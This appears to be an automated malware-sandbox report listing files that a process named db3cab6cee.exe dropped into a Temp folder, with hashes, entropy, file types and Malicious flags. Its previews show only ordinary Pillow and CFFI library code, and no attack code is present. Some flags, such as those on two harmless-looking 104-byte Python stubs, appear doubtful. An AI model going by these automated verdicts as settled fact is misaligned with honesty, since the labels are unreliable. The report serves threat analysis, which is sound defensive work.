                                                                                                                                            SHA-512:7AA9863DC402822A9410EE9580C15E8EFA2FC12623C1700C2A36BA311E57ED40077D9C8BDE287201B4E6CB2F0F53BC4278712901C37C12D042D40B2780C687EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................:.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...d.d...Z.d.S.)......)...annotationsN.....)...__version__F)...action..plural..deprecated..str..when..int | None..replacement..str | Noner....r......bool..return..Nonec...........................|.r.d.n.d.}.|...d.}.nq|.t...........t...........j.........d...............d.........................k.....r.|...d.|...d...}.t...........|.................|.d.k.....r.d.}.n&|.d.k.....r.d.}.n.d.|...d.t.............d...}.t...........|.................|.r.|.r.d.}.t...........|.................|.r.d.|...d...}.n.|.r.d.|.......................d.................d...}.n.d.}.t...........j.........|...d.|...d.|...|.....t...........d...................d.S.).a..... Deprecations helper... :param deprecated: Name of thing to be deprecated.. :param when: Pillow major version to be removed in.. :param replacement: Name of replacement.. :param action: Instead of "replacement", give a custom call to action.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2581504
                                                                                                                                            Entropy (8bit):6.4570322048454365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:pnJZ2yO4Iom0Uo+K7odkwMHALrLrLrLFcJiSx:jMLK7oKv
                                                                                                                                            MD5:F9439D732C0E23BB3E5946766B9B25AC
                                                                                                                                            SHA1:B94CA1150EC3A4C1E89DD5DBA8677A144EE02683
                                                                                                                                            SHA-256:9303B4219ACA0E644CF6745A040A32F9971064014553A39162B099D14032B52B
                                                                                                                                            SHA-512:D90DF0EBDE0D8A814B18D714DF03B930A964BA0582DB48BC5AC13F3AB12F3F6EAD6D399A28B7A8A4B569039000CB397022427874D7293353058B0747F24C5502
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):262656
                                                                                                                                            Entropy (8bit):6.288933748990941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:hIzOs0LsbbcOYRI7OrhdlnLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwL/gQ5gr:WzOs0OGhdlnLg9uP1+74/LgHmPr9qvZq
                                                                                                                                            MD5:558AEF4430544AA81DF9A3620859B28C
                                                                                                                                            SHA1:C7ED2F826F83233765323FBCACEDC8B90A7EEC71
                                                                                                                                            SHA-256:87BED23608193574211D492BCAE6F1C1019F856832E63C49E8CCED5FBA6423E8
                                                                                                                                            SHA-512:C0A7C0DF7718087A9CE26E60553A6F69129E8631446B5F44677B0FDDC430DE2FC193D65F0496BE461CF2238324ACDEEAD640186E5BEADB686FC647B3309D665F
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):104
                                                                                                                                            Entropy (8bit):4.381407443171687
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:166MRm6NKXRZiq7JREvgBFovzZk0ERxR69semUuFLLLy:1RMABJFREYBFovzZk9Rrte7Uy
                                                                                                                                            MD5:9A4E1908FD5B4C2C83D35D49F296647A
                                                                                                                                            SHA1:5BCF65FDEC41A473587C8B8F180B8CD18719FFFB
                                                                                                                                            SHA-256:BD1CD8772330F4480F5A4ECE86D5D224CD55AD37CD0B5EBB8A6EA4172872C277
                                                                                                                                            SHA-512:8EB8D7F82ACB6C390AE40A8233F4DB9DE08B44528C85C136AF45E17EA757E4AA4353427E2AA4A9372A33D4D2DE08A6DB258204A8EE056D8DEA1D7181683AB624
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Any....def __getattr__(name: str) -> Any: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1800704
                                                                                                                                            Entropy (8bit):6.767669682605555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:L3wqBMikcxcpChMsUF/vzVunRT+53YAxX5OT5uFzdjd5p+Jvs1ZnANwOll4:LAEDFhMsUZVunZ+BFz55p+Jvs0v4
                                                                                                                                            MD5:569DD93B5AF5860D0CBB0D53FC21E272
                                                                                                                                            SHA1:ECA48288BD4E0BC74BFAF6E67C874651E57099D4
                                                                                                                                            SHA-256:0264BA60E4AB821439FD459E7C222446CE5B5AB67705714E893288BB4FDB2261
                                                                                                                                            SHA-512:0C9244DE1DA6D3D99F89C534A1BF6428EB23532B5168E0A6F4C9577EE182FCE3625614881E279A3035E43FBDB611739220665A6BE26BA3FDF5D1DBFEC106C047
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):104
                                                                                                                                            Entropy (8bit):4.381407443171687
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:166MRm6NKXRZiq7JREvgBFovzZk0ERxR69semUuFLLLy:1RMABJFREYBFovzZk9Rrte7Uy
                                                                                                                                            MD5:9A4E1908FD5B4C2C83D35D49F296647A
                                                                                                                                            SHA1:5BCF65FDEC41A473587C8B8F180B8CD18719FFFB
                                                                                                                                            SHA-256:BD1CD8772330F4480F5A4ECE86D5D224CD55AD37CD0B5EBB8A6EA4172872C277
                                                                                                                                            SHA-512:8EB8D7F82ACB6C390AE40A8233F4DB9DE08B44528C85C136AF45E17EA757E4AA4353427E2AA4A9372A33D4D2DE08A6DB258204A8EE056D8DEA1D7181683AB624
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Any....def __getattr__(name: str) -> Any: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24064
                                                                                                                                            Entropy (8bit):5.587107570642976
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:WmwU5804Pp/4TsXwCrhBOa8j65SGUkOgyJ+:bp80s4T/Crhsp65I+
                                                                                                                                            MD5:EF3C4398231261CA7A3D8EE43FD9B3AC
                                                                                                                                            SHA1:8AEB32EB678DEAD58E882CB54563E837A8F7405B
                                                                                                                                            SHA-256:595EBD9CCADF1E5359130753CAB00E14990C7369940493F15CA84E151A9F35B3
                                                                                                                                            SHA-512:9C8EC8595856562B4491073E14B8356FFCD9C44FD369E577B2FE86E2EE5904D3789D52CAB9B7F331F411CD71695DA600399B1C36053531239E420FE503CAF2FA
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.0673822664044215
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:rF+9Ck1MbDVmnZDhG1vD2j1whcunt+cqgiR:rCuDVmaoIntegiR
                                                                                                                                            MD5:98AC618322BF57C33E6308FFB21A7F13
                                                                                                                                            SHA1:AC37EDD4880D9F4A06A03EEEB1659C115E0D027E
                                                                                                                                            SHA-256:82240170A65EA252AD1529C147D6AB82246A21139A3BE3DA7C40F945B19A1452
                                                                                                                                            SHA-512:CCBDBEC473F1CCB0D02256D4A928D0C8ED4D510A84B595BE13C993634A9E39BF741232EBFE3C3FA763B1B9ACECD2F7393A03E19DF872D7B0E19DBE062859B167
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14848
                                                                                                                                            Entropy (8bit):4.936810843366955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Dq/Ztwu+7WM00KpbQoSM8ZPdIFoLckgTfgZ:GZoHKpcoSf2o7gTo
                                                                                                                                            MD5:DAF5247E3BCA658F1E1C46D41366D6B2
                                                                                                                                            SHA1:7D604EB863F98184F2D46F2A92B54CE1C433777D
                                                                                                                                            SHA-256:8C80BD1CF8782B5F7AB49A25B1E6A7A14E97E8A72174FD0BFDA5726C2B3C567B
                                                                                                                                            SHA-512:2A5D1D0741E834100E424306632232586741263E1B91B35C9BE1A8D0ADE43885EA9B2BB3B4C1BFCDF5B2FF0513DCC1E64D8187915EEC4799FAD84FB5241E0C64
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):801
                                                                                                                                            Entropy (8bit):5.6739725160748975
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:N4NaMii7wBpnolNZyrk2A3F2QbkF8pqNaZ:waM72poPZy4Z3F2AkF8pqMZ
                                                                                                                                            MD5:E19D6FBCEE5C24F6F5453F96B0BE758E
                                                                                                                                            SHA1:8146B18567FCAEB181DB23A048BF87910C05578D
                                                                                                                                            SHA-256:43BB67863823D9F040D737ACBD6280305E5BCA267C490F0FE556D7499AD2685F
                                                                                                                                            SHA-512:AB01D2A7D6D0FBF1070A55888B1A1F7FEFF963116D1F01F3E4F242B1F8264F6D924ED5856AD996F3EE1B39E3AEFB1D5D6505F514D5369073032EDAF66AE109E3
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1068
                                                                                                                                            Entropy (8bit):5.332493954291429
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:N0/xtiNgquf/7VlS2+/K32Qgw2TVb7/ODW2777vDusXo9Wt4jJiiiimEU1sy4f:6pHJ22uK3x2TZzsP777vDuyuE4jAh18
                                                                                                                                            MD5:66B78F4891F8BB0728D08C4967EBEAC8
                                                                                                                                            SHA1:A02303D682FD6B30DCADAEBCCFF484CC5974DCB5
                                                                                                                                            SHA-256:73261DA2E2419012AEDE5D98C120B51D2CE6B08B74E646638912C5C007EC305A
                                                                                                                                            SHA-512:CE10DF57B55903D603E64CB20A893841BB8CC4429E3B9C96DD98D3080450EEEF771FF11DB88D680DF9B170DDF6D28465C596E8CB4EAF0C18AD1520E71097D7B9
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2145
                                                                                                                                            Entropy (8bit):5.033491724168175
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:1T2MH52vlHaCKADOie35m5rX2Dw+1dXW4v0:1ENt/e35mr4JrVv0
                                                                                                                                            MD5:033B2DDDE79C4598430DA32A0D96245E
                                                                                                                                            SHA1:283B91E49BE704C623F7B092D75CB4C2FAC21634
                                                                                                                                            SHA-256:ED0A821B74135E9596D14B25E76168C5A56425BE16B030AC46B47E95F97AB095
                                                                                                                                            SHA-512:5BC251727E61619EE1870649D6DC17CA9EAB9950B760A440EB1DC41F43B763CEE1EC1870502A538002ABF5BE44E4543C2B1E3FD0866A0E2975F313BEE959ED81
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):293
                                                                                                                                            Entropy (8bit):5.234479929133364
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:NZCNt2cZPecVdvROWSte95/n23d6p9ArV5aCkkNPzl2e/:NZCn9RDStw/2Ipk5ankNbUO
                                                                                                                                            MD5:248D7D149DDB1B1ACB9DB13562ABC5D4
                                                                                                                                            SHA1:B61144B25D6469AADD8C6EA6F599F9D1D900AB45
                                                                                                                                            SHA-256:5F124B539202E4172FCC655D981A415BAED79E7CCF174F7CB67C7922EC4626E1
                                                                                                                                            SHA-512:C8B55B0DDAFC198037E69698FFD83FBB9E278EAF7AEBDBE28563AC40FDF5C7D5CC659D5840E7BC805C8AC031F08629FEE894FB50A6825AB82E52DCFA73465314
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):534528
                                                                                                                                            Entropy (8bit):6.583005042873053
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:n0QIgnVCZh4nbXy8mAC1tQzLrLrLrLWmE5Gx0Hs/Ja:n04wwnbXBzLrLrLrLWmE60Hs/Ja
                                                                                                                                            MD5:8597884C60D295C3299D47B67E907D40
                                                                                                                                            SHA1:E62006CCFA4C8F5B998163E8D1575625663F2CCD
                                                                                                                                            SHA-256:EED91BF609DA0C72BC480801342FAB307B1D2ABE1F5F77D4C591163FC59763F0
                                                                                                                                            SHA-512:7367A23EDE2562347D8DEEE7CBC8A89FB11764B78F790F6D009B2BAFF7127B342599A3B5523F58E2569862E4E1CC1C26AF816E995A3C91C33B32D427F979024B
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14137
                                                                                                                                            Entropy (8bit):5.514404905757016
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:HIsSTupS5bGmdScwStSAYlTKB6Kbmzye8yjIG:HI4NKsKCiyjIG
                                                                                                                                            MD5:882CCB019409596CF2298261C3D88DFD
                                                                                                                                            SHA1:BF36C78EEB0FB19B7EC3879F2CFAA85D0E2F9854
                                                                                                                                            SHA-256:6668885EBF26EB9813DA9F9245F0BF9D885A12AB3E7DE7A456DBB397D1FD229F
                                                                                                                                            SHA-512:38F7E1BAE87159EE08FF7DF79B074E11ED11AF1460D5F3A4BC60E3CB38F98ABCC528484F62538B8C80936C918088BC4B0810F6C034E116F3097B61EE8FC56BDD
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):90557
                                                                                                                                            Entropy (8bit):5.43674379401159
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ybOuTh0ykOrCj/Zo3zXtrieTLgeQotxS+ySd5/8UdUnm1LYmCo+DygKfYQ:Id1+TK3BGeTMOxB5/1UndmCocygKfl
                                                                                                                                            MD5:73D4D9419CB7446D9873A901D9DBEE95
                                                                                                                                            SHA1:552A2E596B756EB169168A3005808B6AA326B17D
                                                                                                                                            SHA-256:5445E67212BEBCEDE5CEED27C19D8FA43C4D517AEA3FE119592A153B4956048B
                                                                                                                                            SHA-512:A28AA2D8DCD7A5CB7C607FFC6C096E6DC454B32A45E1D27FED3ED2CADBD84C01DCD6245243401CDD31692DB3B3CF21C5A0DFADD3F79C71FCD8E6C38931AA2EDA
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3433
                                                                                                                                            Entropy (8bit):5.289521030984535
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ItqbvFGsMIJ27jZTkr/dXaDeZ4+Y9faz9AiiYqV7JWuppXZekqnMfjnF9jK:dbLpyp2qiHqbWupXeV
                                                                                                                                            MD5:1DE929CBCBEBBD80952249C958939A4B
                                                                                                                                            SHA1:FE204B8827978622D63BB9D9909CECC642418325
                                                                                                                                            SHA-256:5E12DC033645A8434FED90EBF06C4C949C9F35B51E284555FDD721D7CC954238
                                                                                                                                            SHA-512:CBE489F2B539C1B75415F05BF903AED6DE3BE88854C7F3D66722B45E63FA9CF681BE9104B12A95106B6722F5ED9BD455B7725DB1D34C14B225DB992E4F64FF76
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16748
                                                                                                                                            Entropy (8bit):5.018941609840301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:fv5z7A/+43FOfiPCa9/mInKXTKKhpIvQJuI3SolzJVzFOTYONOoAPaaaas6vMsp8:fh3TqAfiJ9/eKS+Y7U14sJ6N+v
                                                                                                                                            MD5:6D34066672FCE4E28E63B33BC1E04FF2
                                                                                                                                            SHA1:B74BA3E80B3785584AA63A5A1FB0959FEE9EDD4A
                                                                                                                                            SHA-256:DBEBC419591BDFB31619C7CF429D9C04699C0ADC07CCDF8FA7F260F6A6BE9DD3
                                                                                                                                            SHA-512:28D76C9B3B9D78158E4491385C86322CC71B00940818D57B493C75064FF2CE7BFD33A956218768F815259A9C0DFA45CDDA874232532EBCB01C66D3488EE8CD37
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4221
                                                                                                                                            Entropy (8bit):5.224881897912648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:RrLrGNa21AnSDnrH8Afc1OlPOsN9YUVPB0BA5rYshoK9rf2mJ8ZPkeyoObrbLd:RrLyKnSDrcSXFNqCJ0+5VKQl6ZP1iP5
                                                                                                                                            MD5:680E522B9A2F58875F56DC406C050632
                                                                                                                                            SHA1:2F8897F98C46578805D042B7AD1E36FED772B70C
                                                                                                                                            SHA-256:94247088CB8111A7AA94E77FB6419EFC69DE426FE593697E5613487EF669B111
                                                                                                                                            SHA-512:E65F406DADD9DFD3ACFEACC8D3708BA0F071AA4230BC1EFAC8E99F2EAB3E4E562DC1C7557C28B401815203C03FE99456394183F392261F057A3E02EBD799B406
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1006
                                                                                                                                            Entropy (8bit):5.496827627353536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:H+yKNC///tsl/jU4aT2U5Xpk+Ttj6tIEmsrFuu3euud:HDKY///tE/uT2CEIhsJuu3euud
                                                                                                                                            MD5:3BA36BAE5EC7E6FB0B1AE10251181586
                                                                                                                                            SHA1:6A9539D8C3C4801DE2B7955177053E105BEFBA07
                                                                                                                                            SHA-256:510EEA0837BC0350195AF21218426D0D2DD4DB58D01782916E52043B97A4F838
                                                                                                                                            SHA-512:7A2D54325F194C791AD845524A172E437802BE4F22F3306E90D719B1BA72A6BFCEED5B6EA79B46883A53580AE3CDB57B474A9611CDB194A1E5DFAF8804F14F17
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4042
                                                                                                                                            Entropy (8bit):5.367877116968254
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:B7syNrPYnoy2bGQzJgYcIydFOM8wMTyd32gSwLrYM79ka8:WStG6JgGyXOaR2gpHYM79k7
                                                                                                                                            MD5:2F30AC25F6E022322AF3141DB9D053B9
                                                                                                                                            SHA1:51DADA4039912BE95A30F890718D210425DCF236
                                                                                                                                            SHA-256:699EC65EE8F7784B5A5AC6FD67A1170F82E6B2DF283F57A04F431A46406DA940
                                                                                                                                            SHA-512:72640D076FF62A585D0FD1E3AC57682BE131CC365516DAA4F5FB279D85D4DB9B8AE3D008AC4744340BA48D9475237B2B0C5F9DE2C19F6F8302869CD840E38209
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):37832
                                                                                                                                            Entropy (8bit):5.171996753944043
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:v+163LVGxy0vaWJUiwWiuIATG5y6YkLHtgeeqYEcG:G163LVNTQiulq5fYkLHtgeeq9cG
                                                                                                                                            MD5:40AF50C688F6475473DDF8D4B659BA86
                                                                                                                                            SHA1:D40A7E5B3015E2C347068BAE35735BD7EF3C7286
                                                                                                                                            SHA-256:288C7D30B956B774D12C4F6364287C04A23CB1E76BF04B1B5BF634854B0A1F76
                                                                                                                                            SHA-512:A62C33E3BD4E5438704D7CEB23CFB259D3A13DC67357DC028C6D8A64A66606767BFC545C89B6660A0C878041BBA04B0ED6250BEBFF74718CDB53D3BBB3B32D47
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3688
                                                                                                                                            Entropy (8bit):5.124980816024179
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:1IDZ57T2jjikF+0gv66666IZe1roS966666VxQVaahDy:CDLT2jnEv66666IE18066666VxQVa+y
                                                                                                                                            MD5:8C384B3C8F18B05DF72116B545A5E558
                                                                                                                                            SHA1:A2817E4E6F0B405C18ED7CCEB56C3D4B643833D8
                                                                                                                                            SHA-256:652E6B935A1CEDDE0C212162A3C3006495EEFB7A5BC8EA8A5E54573DD2589C8C
                                                                                                                                            SHA-512:7E2118C4639B29D039FD6F5586A1087251C4344F5939FC774ACEA09C411FD979AB49663EA837FA4111EA69D0C27E11E93ECB1B146D7686C2E34548CF2ACB3B3B
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4176
                                                                                                                                            Entropy (8bit):5.155027763320532
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:MTo6sH65ghUEhmmmOnvyTrVUwAsLbWxUL8SSScX1zBK:MThsHQghlnvyTrVUzObgUL8SSSQ1K
                                                                                                                                            MD5:6F429F57B33E6ECD8A8F21A1ECC82B79
                                                                                                                                            SHA1:6A4267F722ED2937489F7E5336EBB8951370ECCA
                                                                                                                                            SHA-256:9A049F98EE7D85FF4A013C785127B6A707ACAE4E9008A43900088ED817763D9B
                                                                                                                                            SHA-512:B4D930C5462D2870E2959FAFDCC337B7FD31FEE028DA13FC04B50B85F970D8C199A5E978271E4264E1B98C947C5F8FAD549498F3A479EA7F2A914077534A6F4B
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18555
                                                                                                                                            Entropy (8bit):5.283272015095326
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:gKdQmTFVISsWfxfbsJoybRpxQigKt8USU6fVWOuFm1rn:gKd3+Snf+omRhgJAg1rn
                                                                                                                                            MD5:84977BA9AB1A857ACBCC84F33935F333
                                                                                                                                            SHA1:BF9872E3726A97D59B5888781D5B04C9AFC32F19
                                                                                                                                            SHA-256:B79B2A9B9C660F65735D5C8CB11170D519E20E8F5E679D0792DEF50B77C815B4
                                                                                                                                            SHA-512:784EE5245EF57A957419CD0AE71CBB26E556D56B968D2ED4AC2C2DE8D71CE70776A4B5F71BFEA4E4B2CD99FD3429D8B868B832E930753C6C44B1B79798D2B0D4
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):641
                                                                                                                                            Entropy (8bit):5.351258429702836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UTHe/tsqRY3H+gMObsLplK7+0TwFaymWG74gxcq4nZ//2IpBwbaebG7C1Gf4v/:ULelJRY3egMO2po7+0UaiG74gxcqC52v
                                                                                                                                            MD5:579FA5963476826AB590F3FA00054359
                                                                                                                                            SHA1:9BB7D4151B5E13B74ED1604456C8103684EF663C
                                                                                                                                            SHA-256:92ABD35A44EF066831E7837D13646CA24060E21DA4D5CA54795D1BF16B07EB8E
                                                                                                                                            SHA-512:AFD0A931B01561056C9AF491833C3772B493F29BC4F8B94EB7F862462F0B332AA296A7FFDBBD119846C4A334E6CCD991BDB50F477E1161497FE93107FFB265A6
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:C source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3908
                                                                                                                                            Entropy (8bit):4.864498993058693
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:bXEOPSdIhHEObA1aWCHTUQ/BiTUn33PllB0Z1f5HT:oOPS4HEm4Q/0IOZ1fF
                                                                                                                                            MD5:64EFE54B03E5AE3A4DA6775598600F51
                                                                                                                                            SHA1:D9E39B52A6AC381C482234EE5B50883C364F0422
                                                                                                                                            SHA-256:CD05EDEEE47F9BC8145BE7C8DA1260D0AA129091705EFF111949040D9D7BEDD4
                                                                                                                                            SHA-512:FCB69759B1DDA6C2A4982F847B72A54DFE51BB30025D85121C26645D1FE1B9CE56EB9E2942445D7B071B8812D0F3761460D579A9F3C369AE3AF1B287E2B964AD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#ifndef CFFI_MESSAGEBOX.# ifdef _MSC_VER.# define CFFI_MESSAGEBOX 1.# else.# define CFFI_MESSAGEBOX 0.# endif.#endif...#if CFFI_MESSAGEBOX./* Windows only: logic to take the Python-CFFI embedding logic. initialization errors and display them in a background thread. with MessageBox. The idea is that if the whole program closes. as a result of this problem, then likely it is already a console. program and you can read the stderr output in the console too.. If it is not a console program, then it will likely show its own. dialog to complain, or generally not abruptly close, and for this. case the background thread should stay alive..*/.static void *volatile _cffi_bootstrap_text;..static PyObject *_cffi_start_error_capture(void).{. PyObject *result = NULL;. PyObject *x, *m, *bi;.. if (InterlockedCompareExchangePointer(&_cffi_bootstrap_text,. (void *)1, NULL) != NULL). return (PyObject *)1;.. m = PyImport_AddModule("_cffi_error_capture");.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:C source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15055
                                                                                                                                            Entropy (8bit):4.690533967377096
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:KlvoVFhPqMAzcXe1Yzv/uZRj3c4NUf5SlJN7RAh+2r2jSuJjSWoRUMS:TPBEcX87TUf5SxRu4mmmztS
                                                                                                                                            MD5:DCFF8EC5572C6F8B93F967C79345485B
                                                                                                                                            SHA1:7B0D4963DA8C06D3FEDA0ED68E71749945B0622A
                                                                                                                                            SHA-256:131866826F6ACC75B35A2BE37D37B40FB5E9E2B3D4915C5D36EC0684C4CCCDBC
                                                                                                                                            SHA-512:39FED3542C90854E452C53F4200244A008BDB9DE4C9F28DBAB6875B829D5FA10EC2F92D528C302EBFFB303C5FFECEB9DD98F0C8CDD0EF510FF947D86AE48BD12
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#define _CFFI_../* We try to define Py_LIMITED_API before including Python.h... Mess: we can only define it if Py_DEBUG, Py_TRACE_REFS and. Py_REF_DEBUG are not defined. This is a best-effort approximation:. we can learn about Py_DEBUG from pyconfig.h, but it is unclear if. the same works for the other two macros. Py_DEBUG implies them,. but not the other way around... The implementation is messy (issue #350): on Windows, with _MSC_VER,. we have to define Py_LIMITED_API even before including pyconfig.h.. In that case, we guess what pyconfig.h will do to the macros above,. and check our guess after the #include... Note that on Windows, with CPython 3.x, you need >= 3.5 and virtualenv. version >= 16.0.0. With older versions of either, you don't get a. copy of PYTHON3.DLL in the virtualenv. We can't check the version of. CPython *before* we even include pyconfig.h. ffi.set_source() puts. a ``#define _CFFI_NO_LIMITED_API'' at the start of this file if it is
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:C source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18787
                                                                                                                                            Entropy (8bit):4.807109809867737
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:6Z8K0UfQUsVmxEKitt1Fo60VMIOpUU37OSmXNuDQxeOebie8sOHWx6tUm+8wH:XWfNNIIsmoDQxeOebdHx6Um+8wH
